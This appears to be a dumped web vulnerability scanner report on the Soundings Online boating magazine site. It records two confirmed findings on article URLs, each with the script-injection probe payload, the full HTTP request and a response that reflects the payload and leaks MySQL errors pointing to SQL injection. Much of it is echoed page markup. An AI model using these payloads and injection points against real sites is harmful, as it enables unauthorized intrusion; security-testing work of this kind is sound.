<ul class="menu sf-menu" id="mainnav"><li id="current" class="active item1 active1"><a href="http://www.soundingsonline.com/"><span>Home</span></a></li><li class="parent item53"><a href="/news"><span>News</span></a><ul><li class="item115"><a href="/news/coastwise"><span>Coastwise</span></a></li><li class="item84"><a href="/news/todays-top-stories"><span>Today's Top Stories</span></a></li><li class="item86"><a href="/news/home-waters"><span>Home Waters</span></a></li><li class="item85"><a href="/news/mishaps-a-rescues"><span>Mishaps &amp; Rescues</span></a></li><li class="item88"><a href="/news/sailing"><span>Sailing</span></a></li><li class="item222"><a href="/news/dispatches"><span>Dispatches</span></a></li></ul></li><li class="parent item59"><a href="/boat-shop"><span>Boat Shop</span></a><ul><li class="item79"><a href="/boat-shop/sea-savvy"><span>Sea Savvy</span></a></li><li class="item93"><a href="/boat-shop/know-how"><span>Know-How</span></a></li><li class="item94"><a href="/boat-shop/q-a-a"><span>Q &amp; A</span></a></li><li class="item62"><a href="/boat-shop/new-boats"><span>New Boats</span></a></li><li class="item81"><a href="/boat-shop/on-powerboats"><span>On Powerboats</span></a></li><li class="item95"><a href="/boat-shop/on-sailboats"><span>On Sailboats</span></a></li><li class="item63"><a href="/boat-shop/used-boat-review"><span>Used Boat Review</span></a></li><li class="item64"><a href="/boat-shop/new-gear"><span>New Gear</span></a></li><li class="item152"><a href="/boat-shop/tech-talk"><span>Tech Talk</span></a></li></ul></li><li class="parent item65"><a href="/columns-blogs"><span>Columns/Blogs</span></a><ul><li class="item97"><a href="/columns-blogs/under-way"><span>Under Way</span></a></li><li class="item102"><a href="/columns-blogs/books"><span>Books</span></a></li><li class="item98"><a href="/columns-blogs/bay-tripper"><span>Bay Tripper</span></a></li><li class="item99"><a href="/columns-blogs/new-england-fishing"><span>New England Fishing</span></a></li></ul></li><li class="parent item67"><a href="/features"><span>Features</span></a><ul><li class="item89"><a href="/features/destinations"><span>Destinations</span></a></li><li class="item92"><a href="/features/in-depth"><span>In Depth</span></a></li><li class="item91"><a href="/features/type-of-boat"><span>Type of Boat</span></a></li><li class="item90"><a href="/features/profiles"><span>Profiles</span></a></li><li class="item112"><a href="/features/lifestyle"><span>Lifestyle</span></a></li><li class="item162"><a href="/features/technical"><span>Technical</span></a></li><li class="item103"><a href="/features/justyesterday"><span>Just Yesterday</span></a></li></ul></li><li class="item83"><a href="/calendar"><span>Calendar</span></a></li><li class="parent item68"><a href="/subscription-services"><span>Subscription Services</span></a><ul><li class="item113"><a href="http://www.soundingsonline.com/index.php?option=com_chronocontact&amp;chronoformname=CGPage"><span>C.G. Aux.</span></a></li><li class="item163"><a href="http://www.soundingsonline.com/component/chronocontact/?chronoformname=PSPage"><span>U.S. Power Squadron</span></a></li><li class="item69"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=XX&amp;PGTP=A"><span>Missing/Damaged Issue</span></a></li><li class="item73"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=AC&amp;PGTP=A"><span>Address/Email change</span></a></li><li class="item75"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=5U6&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QR&amp;PGTP=A"><span>Renew</span></a></li><li class="item76"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=SND&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Give a Gift</span></a></li><li class="item77"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Subscribe</span></a></li><li class="item202"><a href="/subscription-services/subscribe-to-e-newsletter"><span>..
- /component/content/article/272292/

/component/content/article/272292/ CONFIRMED

http://www.soundingsonline.com/component/content/article/272292/?'%22--%3E%3C/style%3E%3C/script%3E%..

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x0023E6)</script>

Request

GET /component/content/article/272292/?'"--></style></script><script>netsparker(0x0023E6)</script> HTTP/1.1
Referer: http://www.soundingsonline.com/component/content/article/272292/272292
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=nrjskmc2lloa5mrm1f2a65vm63
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:36:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:36:10 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache


<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x0023E6)</script>' AND cookie_info=''' at line 1</font>]</font></blockquote><blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x0023E6)</script>','','1')' at line 1</font>]</font></blockquote><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

<head>
<base href="http://www.soundingsonline.com/component/content/article/272292/" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="robots" content="index, follow" /> <meta name="keywords" content="Print magazine January 2011
Boat dogs" /> <meta name="title" content="Salty Paws" /> <meta name="author" content="William Sisson" /> <meta name="description" content="SoundingsOnline features complete information and entertainment for recreational boaters, including breaking news, boating destinations, boats for sale, new boats and gear, and a complete calendar of boat shows and yachting events. News and feature articles about local people, boats and events are covered in our regional Home Waters section. Thousands of boats for sale; hundreds of waterfront homes." /> <meta name="generator" content="Joomla! 1.5 - Open Source Content Management" /> <title>Salty Paws</title> <link href="/templates/soundings1/favicon.ico" rel="shortcut icon" type="image/x-icon" /> <link rel="stylesheet" href="http://www.soundingsonline.com/components/com_yvcomment/assets/style001.css" type="text/css" /> <script type="text/javascript" src="/media/system/js/mootools.js"></script> <script type="text/javascript" src="/media/system/js/caption.js"></script>

<meta name="verify-v1" content="l1mWAXJWn7Xr+Frn4D39PflSoePEdoO72UMDIxIVjvk=" />

<link rel="stylesheet" href="/templates/system/css/system.css" type="text/css" />
<link rel="stylesheet" href="/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/allstyles.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/navbar.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/editor.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/print.css" type="text/css" media="print" />
<link rel="stylesheet" type="text/css" href="/shadowbox/shadowbox.css" />
<link rel="stylesheet" href="/templates/soundings1/css/fadw.css" type="text/css" media="screen,projection" />
<!--[if lte IE 6]>
<link href="/templates/soundings1/css/ieonly.css" rel="stylesheet" type="text/css" />
<![endif]-->
<!--[if IE 7]>
<link href="/templates/soundings1/css/ie7only.css" rel="stylesheet" type="text/css" />
<![endif]-->

<script type="text/javascript" src="/shadowbox/shadowbox.js"></script>
<script type="text/javascript">
Shadowbox.init({
players: ["img","flv","iframe"]
});
</script>

<script src="/templates/soundings1/javascript/allscripts.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/fadw.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/suckerfish_menu.js" type="text/javascript"></script>
<script language="JavaScript" type="text/javascript" src="//www.soundingsonline.com/s_code.js"></script>

<!------ OAS SETUP begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
//configuration
OAS_url = 'http://oasc05139.247realmedia.com/RealMedia/ads/';
OAS_sitepage = 'www.soundingsonline.com/index.php';
OAS_listpos = 'Top,Middle,Right,Right1,x01,x02,x03,x04';
OAS_query = '';
OAS_target = '_top';
//end of configuration
OAS_version = 10;
OAS_rn = '001234567890'; OAS_rns = '1234567890';
OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring (2, 11);
function OAS_NORMAL(pos) {
document.write('<A HREF="' + OAS_url + 'click_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" TARGET=' + OAS_target + '>');
document.write('<IMG SRC="' + OAS_url + 'adstream_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" BORDER=0></A>');
}
//-->
</SCRIPT>
<SCRIPT LANGUAGE=JavaScript1.1>
<!--
OAS_version = 11;
if ((navigator.userAgent.indexOf('Mozilla/3') != -1) || (navigator.userAgent.indexOf('Mozilla/4.0 WebTV') != -1))
OAS_version = 10;
if (OAS_version >= 11)
document.write('<SCR' + 'IPT LANGUAGE=JavaScript1.1 SRC="' + OAS_url + 'adstream_mjx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '?' + OAS_query + '"><\/SCRIPT>');//-->
</SCRIPT><SCRIPT LANGUAGE=JavaScript>
<!--
document.write('');
function OAS_AD(pos) {
if (OAS_version >= 11)
OAS_RICH(pos);
else
OAS_NORMAL(pos);
} //-->
</SCRIPT>
<!------ OAS SETUP end ------>

</head>


<body class="s_features c_uncategorized m_uncategorized"><!--
Type of page: article<br />Section: 5, s_features<br />Category: 99, c_uncategorized<br />Menu: , m_uncategorized-->
<!--
The name of this site is Soundings Online<br />
The administrator email is e.cirillo@soundingspub.com<br />
This template is in the soundings1 directory<br />
The URL is http://www.soundingsonline.com/-->

<div id="all">
<div id="header">
<div id="leaderboard">
<!------ OAS AD 'Top' begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
OAS_AD('Top');
//-->
</SCRIPT>
<!------ OAS AD 'Top' end ------>
</div>

<div id="search_bar">
<ul class="menu"><li class="item60"><a href="/archives"><span>Archives</span></a></li><li class="item105"><a href="http://www.barkerstores.com/soundings" target="_blank"><span>Buy Soundings Gear</span></a></li><li class="item106"><a href="/advertise"><span>Advertise</span></a></li></ul><!-- Extra Menu -->
<form action="index.php" method="post"> <div class="search"> <input name="searchword" id="mod_search_searchword" maxlength="30" alt="Search" class="inputbox" type="text" size="30" value="Search..." onblur="if(this.value=='') this.value='Search...';" onfocus="if(this.value=='Search...') this.value='';" /><input type="submit" value="Search" class="button" onclick="this.form.searchword.focus();"/> </div> <input type="hidden" name="task" value="search" /> <input type="hidden" name="option" value="com_search" /></form><!-- Search -->
</div> <!-- end search_bar -->

<h1 id="logo"><a href="/index.php"><img src="/templates/soundings1/images/snd_logo.jpg" alt="Soundings" /></a></h1>
<!--<div id="sub_cover"><a href="/"><img src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" /></a></div>-->

<div id="sub_cover">
<map name="subCoverMap" id="subCovers">
<area shape="rect" coords="2,130,83,152" href="http://www.soundingsonline.com/subscription-services" alt="Subscribe" />
<area shape="rect" coords="84,122,164,152" href="http://www.soundingsonline.com/subscription-services/preview-current-issue" alt="Preview Current Issue" />
<img name="subCover" src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" usemap="#subCoverMap" border="0" />
</map>
</div>

<div id="tabs">
<map name="tabsMap" id="tabsMap">
<area shape="rect" coords="0,0,130,40" href="http://www.soundingsonline.com/index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111" alt="Buy a Boat" onmouseover="rollOn('nav1'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="131,0,241,40" href="http://www.soundingssellmyboat.com/" target="_blank" alt="Sell a Boat" onmouseover="rollOn('nav2'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="242,0,357,40" href="http://www.soundingsonline.com/component/content/article/237622" alt="Service Directory" onmouseover="rollOn('nav3'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="358,0,471,40" href="http://www.soundingsonline.com/Waterfront/default.html" target="_blank" alt="Waterfront Property" onmouseover="rollOn('nav4'); return true;" onmouseout="rollOff(); return true;" />
</map>

<img name="navs" src="//www.soundingsonline.com/templates/soundings1/images/header_tabs.jpg" width="471" height="41" usemap="#tabsMap" border="0" alt="Buy a Boat Online Search, Sell a Boat Classifieds, Boat Locker Marketplace, Waterfront Property" />
</div>

<ul class="menu sf-menu" id="mainnav"><li id="current" class="active item1 active1"><a href="http://www.soundingsonline.com/"><span>Home</span></a></li><li class="parent item53"><a href="/news"><span>News</span></a><ul><li class="item115"><a href="/news/coastwise"><span>Coastwise</span></a></li><li class="item84"><a href="/news/todays-top-stories"><span>Today's Top Stories</span></a></li><li class="item86"><a href="/news/home-waters"><span>Home Waters</span></a></li><li class="item85"><a href="/news/mishaps-a-rescues"><span>Mishaps &amp; Rescues</span></a></li><li class="item88"><a href="/news/sailing"><span>Sailing</span></a></li><li class="item222"><a href="/news/dispatches"><span>Dispatches</span></a></li></ul></li><li class="parent item59"><a href="/boat-shop"><span>Boat Shop</span></a><ul><li class="item79"><a href="/boat-shop/sea-savvy"><span>Sea Savvy</span></a></li><li class="item93"><a href="/boat-shop/know-how"><span>Know-How</span></a></li><li class="item94"><a href="/boat-shop/q-a-a"><span>Q &amp; A</span></a></li><li class="item62"><a href="/boat-shop/new-boats"><span>New Boats</span></a></li><li class="item81"><a href="/boat-shop/on-powerboats"><span>On Powerboats</span></a></li><li class="item95"><a href="/boat-shop/on-sailboats"><span>On Sailboats</span></a></li><li class="item63"><a href="/boat-shop/used-boat-review"><span>Used Boat Review</span></a></li><li class="item64"><a href="/boat-shop/new-gear"><span>New Gear</span></a></li><li class="item152"><a href="/boat-shop/tech-talk"><span>Tech Talk</span></a></li></ul></li><li class="parent item65"><a href="/columns-blogs"><span>Columns/Blogs</span></a><ul><li class="item97"><a href="/columns-blogs/under-way"><span>Under Way</span></a></li><li class="item102"><a href="/columns-blogs/books"><span>Books</span></a></li><li class="item98"><a href="/columns-blogs/bay-tripper"><span>Bay Tripper</span></a></li><li class="item99"><a href="/columns-blogs/new-england-fishing"><span>New England Fishing</span></a></li></ul></li><li class="parent item67"><a href="/features"><span>Features</span></a><ul><li class="item89"><a href="/features/destinations"><span>Destinations</span></a></li><li class="item92"><a href="/features/in-depth"><span>In Depth</span></a></li><li class="item91"><a href="/features/type-of-boat"><span>Type of Boat</span></a></li><li class="item90"><a href="/features/profiles"><span>Profiles</span></a></li><li class="item112"><a href="/features/lifestyle"><span>Lifestyle</span></a></li><li class="item162"><a href="/features/technical"><span>Technical</span></a></li><li class="item103"><a href="/features/justyesterday"><span>Just Yesterday</span></a></li></ul></li><li class="item83"><a href="/calendar"><span>Calendar</span></a></li><li class="parent item68"><a href="/subscription-services"><span>Subscription Services</span></a><ul><li class="item113"><a href="http://www.soundingsonline.com/index.php?option=com_chronocontact&amp;chronoformname=CGPage"><span>C.G. Aux.</span></a></li><li class="item163"><a href="http://www.soundingsonline.com/component/chronocontact/?chronoformname=PSPage"><span>U.S. Power Squadron</span></a></li><li class="item69"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=XX&amp;PGTP=A"><span>Missing/Damaged Issue</span></a></li><li class="item73"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=AC&amp;PGTP=A"><span>Address/Email change</span></a></li><li class="item75"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=5U6&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QR&amp;PGTP=A"><span>Renew</span></a></li><li class="item76"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=SND&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Give a Gift</span></a></li><li class="item77"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Subscribe</span></a></li><li class="item202"><a href="/subscription-services/subscribe-to-e-newsletter"><span>E-Newsletter Sign-up</span></a></li></ul></li><li class="parent item80"><a href="#"><span>More</span></a><ul><li class="item110"><a href="/advertise"><span>Advertise</span></a></li><li class="item122"><a href="/more/the-masters-series"><span>The Master's Series</span></a></li><li class="item66"><a href="/more/digital-publications"><span>Digital Publica..
- /component/content/article/272292/272292

/component/content/article/272292/272292 CONFIRMED

http://www.soundingsonline.com/component/content/article/272292/272292?'%22--%3E%3C/style%3E%3C/scri..

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x0023D9)</script>

Request

GET /component/content/article/272292/272292?'"--></style></script><script>netsparker(0x0023D9)</script> HTTP/1.1
Referer: http://www.soundingsonline.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=nrjskmc2lloa5mrm1f2a65vm63
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:36:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:36:10 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache


<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x0023D9)</script>' AND cookie_info=''' at line 1</font>]</font></blockquote><blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x0023D9)</script>','','1')' at line 1</font>]</font></blockquote><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

<head>
<base href="http://www.soundingsonline.com/component/content/article/272292/272292" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="robots" content="index, follow" /> <meta name="keywords" content="Print magazine January 2011
Boat dogs" /> <meta name="title" content="Salty Paws" /> <meta name="author" content="William Sisson" /> <meta name="description" content="SoundingsOnline features complete information and entertainment for recreational boaters, including breaking news, boating destinations, boats for sale, new boats and gear, and a complete calendar of boat shows and yachting events. News and feature articles about local people, boats and events are covered in our regional Home Waters section. Thousands of boats for sale; hundreds of waterfront homes." /> <meta name="generator" content="Joomla! 1.5 - Open Source Content Management" /> <title>Salty Paws</title> <link href="/templates/soundings1/favicon.ico" rel="shortcut icon" type="image/x-icon" /> <link rel="stylesheet" href="http://www.soundingsonline.com/components/com_yvcomment/assets/style001.css" type="text/css" /> <script type="text/javascript" src="/media/system/js/mootools.js"></script> <script type="text/javascript" src="/media/system/js/caption.js"></script>

<meta name="verify-v1" content="l1mWAXJWn7Xr+Frn4D39PflSoePEdoO72UMDIxIVjvk=" />

<link rel="stylesheet" href="/templates/system/css/system.css" type="text/css" />
<link rel="stylesheet" href="/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/allstyles.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/navbar.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/editor.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/print.css" type="text/css" media="print" />
<link rel="stylesheet" type="text/css" href="/shadowbox/shadowbox.css" />
<link rel="stylesheet" href="/templates/soundings1/css/fadw.css" type="text/css" media="screen,projection" />
<!--[if lte IE 6]>
<link href="/templates/soundings1/css/ieonly.css" rel="stylesheet" type="text/css" />
<![endif]-->
<!--[if IE 7]>
<link href="/templates/soundings1/css/ie7only.css" rel="stylesheet" type="text/css" />
<![endif]-->

<script type="text/javascript" src="/shadowbox/shadowbox.js"></script>
<script type="text/javascript">
Shadowbox.init({
players: ["img","flv","iframe"]
});
</script>

<script src="/templates/soundings1/javascript/allscripts.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/fadw.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/suckerfish_menu.js" type="text/javascript"></script>
<script language="JavaScript" type="text/javascript" src="//www.soundingsonline.com/s_code.js"></script>

<!------ OAS SETUP begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
//configuration
OAS_url = 'http://oasc05139.247realmedia.com/RealMedia/ads/';
OAS_sitepage = 'www.soundingsonline.com/index.php';
OAS_listpos = 'Top,Middle,Right,Right1,x01,x02,x03,x04';
OAS_query = '';
OAS_target = '_top';
//end of configuration
OAS_version = 10;
OAS_rn = '001234567890'; OAS_rns = '1234567890';
OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring (2, 11);
function OAS_NORMAL(pos) {
document.write('<A HREF="' + OAS_url + 'click_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" TARGET=' + OAS_target + '>');
document.write('<IMG SRC="' + OAS_url + 'adstream_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" BORDER=0></A>');
}
//-->
</SCRIPT>
<SCRIPT LANGUAGE=JavaScript1.1>
<!--
OAS_version = 11;
if ((navigator.userAgent.indexOf('Mozilla/3') != -1) || (navigator.userAgent.indexOf('Mozilla/4.0 WebTV') != -1))
OAS_version = 10;
if (OAS_version >= 11)
document.write('<SCR' + 'IPT LANGUAGE=JavaScript1.1 SRC="' + OAS_url + 'adstream_mjx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '?' + OAS_query + '"><\/SCRIPT>');//-->
</SCRIPT><SCRIPT LANGUAGE=JavaScript>
<!--
document.write('');
function OAS_AD(pos) {
if (OAS_version >= 11)
OAS_RICH(pos);
else
OAS_NORMAL(pos);
} //-->
</SCRIPT>
<!------ OAS SETUP end ------>

</head>


<body class="s_features c_uncategorized m_uncategorized"><!--
Type of page: article<br />Section: 5, s_features<br />Category: 99, c_uncategorized<br />Menu: , m_uncategorized-->
<!--
The name of this site is Soundings Online<br />
The administrator email is e.cirillo@soundingspub.com<br />
This template is in the soundings1 directory<br />
The URL is http://www.soundingsonline.com/-->

<div id="all">
<div id="header">
<div id="leaderboard">
<!------ OAS AD 'Top' begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
OAS_AD('Top');
//-->
</SCRIPT>
<!------ OAS AD 'Top' end ------>
</div>

<div id="search_bar">
<ul class="menu"><li class="item60"><a href="/archives"><span>Archives</span></a></li><li class="item105"><a href="http://www.barkerstores.com/soundings" target="_blank"><span>Buy Soundings Gear</span></a></li><li class="item106"><a href="/advertise"><span>Advertise</span></a></li></ul><!-- Extra Menu -->
<form action="index.php" method="post"> <div class="search"> <input name="searchword" id="mod_search_searchword" maxlength="30" alt="Search" class="inputbox" type="text" size="30" value="Search..." onblur="if(this.value=='') this.value='Search...';" onfocus="if(this.value=='Search...') this.value='';" /><input type="submit" value="Search" class="button" onclick="this.form.searchword.focus();"/> </div> <input type="hidden" name="task" value="search" /> <input type="hidden" name="option" value="com_search" /></form><!-- Search -->
</div> <!-- end search_bar -->

<h1 id="logo"><a href="/index.php"><img src="/templates/soundings1/images/snd_logo.jpg" alt="Soundings" /></a></h1>
<!--<div id="sub_cover"><a href="/"><img src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" /></a></div>-->

<div id="sub_cover">
<map name="subCoverMap" id="subCovers">
<area shape="rect" coords="2,130,83,152" href="http://www.soundingsonline.com/subscription-services" alt="Subscribe" />
<area shape="rect" coords="84,122,164,152" href="http://www.soundingsonline.com/subscription-services/preview-current-issue" alt="Preview Current Issue" />
<img name="subCover" src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" usemap="#subCoverMap" border="0" />
</map>
</div>

<div id="tabs">
<map name="tabsMap" id="tabsMap">
<area shape="rect" coords="0,0,130,40" href="http://www.soundingsonline.com/index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111" alt="Buy a Boat" onmouseover="rollOn('nav1'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="131,0,241,40" href="http://www.soundingssellmyboat.com/" target="_blank" alt="Sell a Boat" onmouseover="rollOn('nav2'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="242,0,357,40" href="http://www.soundingsonline.com/component/content/article/237622" alt="Service Directory" onmouseover="rollOn('nav3'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="358,0,471,40" href="http://www.soundingsonline.com/Waterfront/default.html" target="_blank" alt="Waterfront Property" onmouseover="rollOn('nav4'); return true;" onmouseout="rollOff(); return true;" />
</map>

<img name="navs" src="//www.soundingsonline.com/templates/soundings1/images/header_tabs.jpg" width="471" height="41" usemap="#tabsMap" border="0" alt="Buy a Boat Online Search, Sell a Boat Classifieds, Boat Locker Marketplace, Waterfront Property" />
</div>

<ul class="menu sf-menu" id="mainnav"><li id="current" class="active item1 active1"><a href="http://www.soundingsonline.com/"><span>Home</span></a></li><li class="parent item53"><a href="/news"><span>News</span></a><ul><li class="item115"><a href="/news/coastwise"><span>Coastwise</span></a></li><li class="item84"><a href="/news/todays-top-stories"><span>Today's Top Stories</span></a></li><li class="item86"><a href="/news/home-waters"><span>Home Waters</span></a></li><li class="item85"><a href="/news/mishaps-a-rescues"><span>Mishaps &amp; Rescues</span></a></li><li class="item88"><a href="/news/sailing"><span>Sailing</span></a></li><li class="item222"><a href="/news/dispatches"><span>Dispatches</span></a></li></ul></li><li class="parent item59"><a href="/boat-shop"><span>Boat Shop</span></a><ul><li class="item79"><a href="/boat-shop/sea-savvy"><span>Sea Savvy</span></a></li><li class="item93"><a href="/boat-shop/know-how"><span>Know-How</span></a></li><li class="item94"><a href="/boat-shop/q-a-a"><span>Q &amp; A</span></a></li><li class="item62"><a href="/boat-shop/new-boats"><span>New Boats</span></a></li><li class="item81"><a href="/boat-shop/on-powerboats"><span>On Powerboats</span></a></li><li class="item95"><a href="/boat-shop/on-sailboats"><span>On Sailboats</span></a></li><li class="item63"><a href="/boat-shop/used-boat-review"><span>Used Boat Review</span></a></li><li class="item64"><a href="/boat-shop/new-gear"><span>New Gear</span></a></li><li class="item152"><a href="/boat-shop/tech-talk"><span>Tech Talk</span></a></li></ul></li><li class="parent item65"><a href="/columns-blogs"><span>Columns/Blogs</span></a><ul><li class="item97"><a href="/columns-blogs/under-way"><span>Under Way</span></a></li><li class="item102"><a href="/columns-blogs/books"><span>Books</span></a></li><li class="item98"><a href="/columns-blogs/bay-tripper"><span>Bay Tripper</span></a></li><li class="item99"><a href="/columns-blogs/new-england-fishing"><span>New England Fishing</span></a></li></ul></li><li class="parent item67"><a href="/features"><span>Features</span></a><ul><li class="item89"><a href="/features/destinations"><span>Destinations</span></a></li><li class="item92"><a href="/features/in-depth"><span>In Depth</span></a></li><li class="item91"><a href="/features/type-of-boat"><span>Type of Boat</span></a></li><li class="item90"><a href="/features/profiles"><span>Profiles</span></a></li><li class="item112"><a href="/features/lifestyle"><span>Lifestyle</span></a></li><li class="item162"><a href="/features/technical"><span>Technical</span></a></li><li class="item103"><a href="/features/justyesterday"><span>Just Yesterday</span></a></li></ul></li><li class="item83"><a href="/calendar"><span>Calendar</span></a></li><li class="parent item68"><a href="/subscription-services"><span>Subscription Services</span></a><ul><li class="item113"><a href="http://www.soundingsonline.com/index.php?option=com_chronocontact&amp;chronoformname=CGPage"><span>C.G. Aux.</span></a></li><li class="item163"><a href="http://www.soundingsonline.com/component/chronocontact/?chronoformname=PSPage"><span>U.S. Power Squadron</span></a></li><li class="item69"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=XX&amp;PGTP=A"><span>Missing/Damaged Issue</span></a></li><li class="item73"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=AC&amp;PGTP=A"><span>Address/Email change</span></a></li><li class="item75"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=5U6&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QR&amp;PGTP=A"><span>Renew</span></a></li><li class="item76"><a 